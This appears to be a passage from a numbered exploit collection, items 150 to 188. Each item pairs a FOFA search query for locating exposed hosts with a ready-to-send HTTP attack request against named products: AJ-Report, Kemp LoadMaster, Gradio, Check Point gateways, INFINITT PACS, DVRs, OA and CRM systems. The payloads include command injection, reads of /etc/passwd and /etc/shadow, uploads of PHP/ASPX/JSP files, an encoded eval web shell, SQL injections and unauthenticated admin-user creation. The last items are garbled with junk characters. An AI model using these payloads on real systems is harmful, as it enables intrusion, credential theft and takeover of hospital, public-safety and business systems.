Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA)
Affected: LoadMaster <= 7.2.54.8 (LTSF)
Affected: LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform: SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) navigation page: arbitrary file upload via file.php
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (medical imaging archiving and communication system) WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. Hefeng multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Hui Campus (Anxiaoyi) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin ticketing management platform SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (LVS) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen Information Technology enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen Technology enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (Interlib) library cluster management system updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao Technology X2Modbus gateway AddUser arbitrary user addition
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

: e  Y. X0 v- v- z186. F-logic DataCube3 SQL注入  y4 A$ }4 r. H
CVE-2024-31750/ A  H1 H: q/ @% I* c, v! d7 _. P
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
% a. i( q& W+ l! hFOFA:title=="DataCube3"
$ v) u' h+ _, n. |: d( Q. wPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
9 t) V. e; c' F% hHost: your-ip
9 j) X( f% W! ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
) ?7 ~$ p* y: y5 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.81 k/ p" f4 S6 Z- {$ o5 }  n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 x% C% R6 {, ], n6 y
Accept-Encoding: gzip, deflate4 V" b& a! s8 o5 H. X2 w
Connection: close
6 h( a2 h5 t/ P; `6 c9 HContent-Type: application/x-www-form-urlencoded
. h: ]: h$ W7 M3 C1 X* d" u
' D0 Z" x2 Y' T6 j: p3 Q3 N; Sreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450/ I9 x  D- j1 u
4 y+ e/ q7 p1 M, t& I

- j! h; L! U/ @) \- t* V5 b& i187. Mura CMS processAsyncObject SQL注入
, A' y; c% g- t) D+ RCVE-2024-32640
+ M1 x8 Y, o' |/ YFOFA:"Mura CMS"
$ Z7 Y& ]( m% L' O7 n; |+ ZPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
' `+ R, @& S6 U1 ~9 P% D, r6 RHost: your-ip
0 Z# s' @9 h" c/ @Content-Type: application/x-www-form-urlencoded
5 |6 Q9 H) H$ t, @) w1 O) f, S- J( }
. c' b7 g3 [1 Z( a" h6 k/ G# Z1 Q: |
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
6 ]5 n" T3 M+ O) U: ?( Z+ Q0 d8 h! k0 w  k( V
& {, d& Z; B; q' |1 ~
188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
